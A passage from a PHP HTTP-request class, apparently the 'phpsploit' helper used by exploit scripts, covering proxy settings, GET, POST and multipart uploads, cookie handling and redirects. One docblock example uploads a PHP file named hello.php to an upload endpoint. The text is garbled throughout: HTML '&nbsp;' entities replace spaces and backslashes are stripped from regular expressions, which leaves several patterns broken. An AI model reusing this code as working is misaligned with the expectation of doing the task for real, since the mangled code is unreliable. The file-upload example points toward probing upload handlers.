//&nbsp;$this->proxy(\"localhost:8118\"); if(empty($proxyp)) { preg_match(\"/^(S*):(d+)$/\",$proxy,$proxarr); $proxh&nbsp;=&nbsp;$proxarr[1]; $proxp&nbsp;=&nbsp;$proxarr[2]; $this->proxyhost=$proxh; $this->proxyport=$proxp; } //&nbsp;$this->proxy(\"localhost\",8118); else&nbsp; { $this->proxyhost=$proxy; $this->proxyport=intval($proxyp); } if($this->proxyport&nbsp;>&nbsp;65535)&nbsp;die(\"Error:&nbsp;Invalid&nbsp;port&nbsp;number\"); } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;use&nbsp;an&nbsp;http&nbsp;proxy&nbsp;server &nbsp;*&nbsp;which&nbsp;requires&nbsp;a&nbsp;basic&nbsp;authentification.&nbsp;Several &nbsp;*&nbsp;methods&nbsp;are&nbsp;supported: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->proxyauth(\"darkfig\",\"dapasswd\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->proxyauth(\"darkfig:dapasswd\"); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxyuser &nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxypass &nbsp;*/ public&nbsp;function&nbsp;proxyauth($proxyauth,$proxypasse=\'\') { //&nbsp;$this->proxyauth(\"darkfig:password\"); if(empty($proxypasse)) { preg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr); $proxu&nbsp;=&nbsp;$proxautharr[1]; $proxp&nbsp;=&nbsp;$proxautharr[2]; $this->proxyuser=$proxu; $this->proxypass=$proxp; } //&nbsp;$this->proxyauth(\"darkfig\",\"password\"); else { $this->proxyuser=$proxyauth; $this->proxypass=$proxypasse; } } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;set&nbsp;the&nbsp;\"User-Agent\"&nbsp;header. &nbsp;*&nbsp;Several&nbsp;methods&nbsp;are&nbsp;possible&nbsp;to&nbsp;do&nbsp;that: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->agent(\"Mozilla&nbsp;Firefox\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addheader(\"User-Agent:&nbsp;Mozilla&nbsp;Firefox\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addheader(\"User-Agent\",\"Mozilla&nbsp;Firefox\"); &nbsp;*&nbsp; &nbsp;*&nbsp;@param&nbsp;string&nbsp;$useragent &nbsp;*/ public&nbsp;function&nbsp;agent($useragent) { $this->agent=$useragent; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;header&nbsp;which&nbsp;will&nbsp;be &nbsp;*&nbsp;in&nbsp;the&nbsp;next&nbsp;request. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->showheader(); &nbsp;* &nbsp;*&nbsp;@return&nbsp;$header &nbsp;*/ public&nbsp;function&nbsp;showheader() { return&nbsp;$this->header; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;cookie&nbsp;which&nbsp;will&nbsp;be &nbsp;*&nbsp;in&nbsp;the&nbsp;next&nbsp;request. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->showcookie(); &nbsp;* &nbsp;*&nbsp;@return&nbsp;$storedcookies &nbsp;*/ public&nbsp;function&nbsp;showcookie() { return&nbsp;$this->cookie; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;last&nbsp;formed &nbsp;*&nbsp;http&nbsp;request&nbsp;(the&nbsp;http&nbsp;packet). &nbsp;*&nbsp; &nbsp;*&nbsp;$this->showlastrequest(); &nbsp;*&nbsp; &nbsp;*&nbsp;@return&nbsp;$last_http_request &nbsp;*/ public&nbsp;function&nbsp;showlastrequest() { return&nbsp;$this->packet; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the &nbsp;*&nbsp;GET&nbsp;method.&nbsp;You&nbsp;can&nbsp;precise&nbsp;the&nbsp;port&nbsp;of&nbsp;the&nbsp;host. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->get(\"http://localhost\"); &nbsp;*&nbsp;$this->get(\"http://localhost:888/xd/tst.php\"); &nbsp;*&nbsp; &nbsp;*&nbsp;@param&nbsp;string&nbsp;$urlwithpath &nbsp;*&nbsp;@return&nbsp;$server_response &nbsp;*/ public&nbsp;function&nbsp;get($url) { $this->target($url); $this->method=\"get\"; return&nbsp;$this->sock(); } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the &nbsp;*&nbsp;POST&nbsp;method.&nbsp;You&nbsp;can&nbsp;precise&nbsp;the&nbsp;port&nbsp;of&nbsp;the&nbsp;host. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->post(\"http://localhost/index.php\",\"admin=1&user=dark\"); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$urlwithpath &nbsp;*&nbsp;@param&nbsp;string&nbsp;$postdata &nbsp;*&nbsp;@return&nbsp;$server_response &nbsp;*/ public&nbsp;function&nbsp;post($url,$data) { $this->target($url); $this->method=\"post\"; $this->data=$data; return&nbsp;$this->sock(); } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the &nbsp;*&nbsp;POST&nbsp;method&nbsp;using&nbsp;the&nbsp;multipart/form-data&nbsp;enctype.&nbsp; &nbsp;*&nbsp; &nbsp;*&nbsp;$array&nbsp;=&nbsp;array( &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_url&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\"http://localhost/upload.php\", &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_boundary&nbsp;=>&nbsp;\"123456\",&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Optional &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"email\"&nbsp;=>&nbsp;\"me@u.com\", &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"varname\"&nbsp;=>&nbsp;array( &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_type&nbsp;=>&nbsp;\"image/gif\",&nbsp;&nbsp;&nbsp;#&nbsp;Optional &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_transfert&nbsp;=>&nbsp;\"binary\",&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Optional &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_filename&nbsp;=>&nbsp;\"hello.php\", &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_content&nbsp;=>&nbsp;\"<?php&nbsp;echo&nbsp;\':)\';&nbsp;?>\")); &nbsp;*&nbsp;$this->formdata($array); &nbsp;* &nbsp;*&nbsp;@param&nbsp;array&nbsp;$array &nbsp;*&nbsp;@return&nbsp;$server_response &nbsp;*/ public&nbsp;function&nbsp;formdata($array) { $this->target($array[frmdt_url]); $this->method=\"formdata\"; $this->data=\'\'; if(!isset($array[frmdt_boundary]))&nbsp;$this->boundary=\"phpsploit\"; else&nbsp;$this->boundary=$array[frmdt_boundary]; foreach($array&nbsp;as&nbsp;$key&nbsp;=>&nbsp;$value) { if(!preg_match(\"#^frmdt_(boundary|url)#\",$key)) { $this->data&nbsp;.=&nbsp;\"-----------------------------\".$this->boundary.\" \"; $this->data&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\"\".$key.\"\";\"; if(!is_array($value)) { $this->data&nbsp;.=&nbsp;\" \".$value.\" \"; } else { $this->data&nbsp;.=&nbsp;\"&nbsp;filename=\"\".$array[$key][frmdt_filename].\"\"; \"; if(isset($array[$key][frmdt_type]))&nbsp;$this->data&nbsp;.=&nbsp;\"Content-Type:&nbsp;\".$array[$key][frmdt_type].\" \"; if(isset($array[$key][frmdt_transfert]))&nbsp;$this->data&nbsp;.=&nbsp;\"Content-Transfer-Encoding:&nbsp;\".$array[$key][frmdt_transfert].\" \"; $this->data&nbsp;.=&nbsp;\" \".$array[$key][frmdt_content].\" \"; } } } $this->data&nbsp;.=&nbsp;\"-----------------------------\".$this->boundary.\"-- \"; return&nbsp;$this->sock(); } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;content&nbsp;of&nbsp;the&nbsp;server&nbsp;response &nbsp;*&nbsp;without&nbsp;the&nbsp;headers. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->getcontent($this->get(\"http://localhost/\")); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->getcontent(); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response &nbsp;*&nbsp;@return&nbsp;$onlythecontent &nbsp;*/ public&nbsp;function&nbsp;getcontent($code=\'\') { if(empty($code))&nbsp;$code&nbsp;=&nbsp;$this->recv; $content&nbsp;=&nbsp;explode(\" \",$code); $onlycode&nbsp;=&nbsp;\'\'; for($i=1;$i<count($content);$i++) { if(!preg_match(\"/^(S*):/\",$content[$i]))&nbsp;$ok&nbsp;=&nbsp;1; if($ok)&nbsp;$onlycode&nbsp;.=&nbsp;$content[$i].\" \"; } return&nbsp;$onlycode; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;headers&nbsp;of&nbsp;the&nbsp;server&nbsp;response &nbsp;*&nbsp;without&nbsp;the&nbsp;content. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\")); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->getheader(); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response &nbsp;*&nbsp;@return&nbsp;$onlytheheaders &nbsp;*/ public&nbsp;function&nbsp;getheader($code=\'\') { if(empty($code))&nbsp;$code&nbsp;=&nbsp;$this->recv; $header&nbsp;=&nbsp;explode(\" \",$code); $onlyheader&nbsp;=&nbsp;$header[0].\" \"; for($i=1;$i<count($header);$i++) { if(!preg_match(\"/^(S*):/\",$header[$i]))&nbsp;break; $onlyheader&nbsp;.=&nbsp;$header[$i].\" \"; } return&nbsp;$onlyheader; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;cookiejar()&nbsp;function. &nbsp;*&nbsp;It&nbsp;adds&nbsp;the&nbsp;value&nbsp;of&nbsp;the&nbsp;\"Set-Cookie\"&nbsp;header&nbsp;in&nbsp;the&nbsp;\"Cookie\" &nbsp;*&nbsp;header&nbsp;for&nbsp;the&nbsp;next&nbsp;request.&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it. &nbsp;*&nbsp; &nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response &nbsp;*/ private&nbsp;function&nbsp;getcookie($code) { $carr&nbsp;=&nbsp;explode(\" \",str_replace(\" \",\" \",$code)); for($z=0;$z<count($carr);$z++) { if(preg_match(\"/set-cookie:&nbsp;(.*)/i\",$carr[$z],$cookarr)) { $cookie[]&nbsp;=&nbsp;preg_replace(\"/expires=(.*)(GMT||UTC)(S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1])); } } for($i=0;$i<count($cookie);$i++) { preg_match(\"/(S*)=(S*)(|;)/\",$cookie[$i],$matches); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookn&nbsp;=&nbsp;$matches[1]; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookv&nbsp;=&nbsp;$matches[2]; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->addcookie($cookn,$cookv); } &nbsp;&nbsp;&nbsp;&nbsp;} /** &nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;get()/post()&nbsp;functions. &nbsp;*&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it. &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$urltarg &nbsp;*/ private&nbsp;function&nbsp;target($urltarg) { if(!preg_match(\"/^http://(.*)//\",$urltarg))&nbsp;$urltarg&nbsp;.=&nbsp;\"/\"; $this->url=$urltarg; $array&nbsp;=&nbsp;explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg))); $this->host=$array[0]; preg_match(\"/:(d+)//\",$urltarg,$matches); $this->port=empty($matches[1])&nbsp;?&nbsp;80&nbsp;:&nbsp;$matches[1]; $temp&nbsp;=&nbsp;str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg)); preg_match(\"//(.*)//\",$temp,$matches); $this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\"); if($this->port&nbsp;>&nbsp;65535)&nbsp;die(\"Error:&nbsp;Invalid&nbsp;port&nbsp;number\"); } /** &nbsp;*&nbsp;If&nbsp;you&nbsp;call&nbsp;this&nbsp;function,&nbsp;the&nbsp;script&nbsp;will &nbsp;*&nbsp;extract&nbsp;all&nbsp;\"Set-Cookie\"&nbsp;headers&nbsp;values &nbsp;*&nbsp;and&nbsp;it&nbsp;will&nbsp;automatically&nbsp;add&nbsp;them&nbsp;into&nbsp;the&nbsp;\"Cookie\"&nbsp;header &nbsp;*&nbsp;for&nbsp;all&nbsp;next&nbsp;requests. &nbsp;* &nbsp;*&nbsp;$this->cookiejar(1);&nbsp;//&nbsp;enabled &nbsp;*&nbsp;$this->cookiejar(0);&nbsp;//&nbsp;disabled &nbsp;*&nbsp; &nbsp;*/ public&nbsp;function&nbsp;cookiejar($code) { if($code===0)&nbsp;$this->cookiejar=\'\'; if($code===1)&nbsp;$this->cookiejar=1; else { $this->getcookie($code); } } /** &nbsp;*&nbsp;If&nbsp;you&nbsp;call&nbsp;this&nbsp;function,&nbsp;the&nbsp;script&nbsp;will &nbsp;*&nbsp;follow&nbsp;all&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->allowredirection(1);&nbsp;//&nbsp;enabled &nbsp;*&nbsp;$this->allowredirection(0);&nbsp;//&nbsp;disabled &nbsp;*&nbsp; &nbsp;*&nbsp;@return&nbsp;$this->get($locationresponse) &nbsp;*/ public&nbsp;function&nbsp;allowredirection($code) { if($code===0)&nbsp;$this->allowredirection=\'\'; if($code===1)&nbsp;$this->allowredirection=1; else { if(preg_match(\"/(location|content-location|uri):&nbsp;(.*)/i\",$code,$codearr)) { $location&nbsp;=&nbsp;str_replace(chr(13),\'\',$codearr[2]); if(!eregi(\"://\",$location)) { return&nbsp;$this->get(\"http://\".$this->host.$this->path.$location); } else { return&nbsp;$this->get($location); } } else { return&nbsp;$code; } } } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;reset&nbsp;some&nbsp;parameters: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->reset(header);&nbsp;//&nbsp;headers&nbsp;cleaned &nbsp;*&nbsp;$this->reset(cookie);&nbsp;//&nbsp;cookies&nbsp;cleaned &nbsp;*&nbsp;$this->reset();&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;clean&nbsp;all&nbsp;parameters &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$func &nbsp;*/ public&nbsp;function&nbsp;reset($func=\'\') { switch($func) { case&nbsp;\"header\": $this->header=\'\'; break; case&nbsp;\"cookie\": $this->cookie=\'\'; break; default: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->cookiejar=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->header=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->cookie=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->allowredirection=\'\';&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->agent=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break; } } } ?>&nbsp;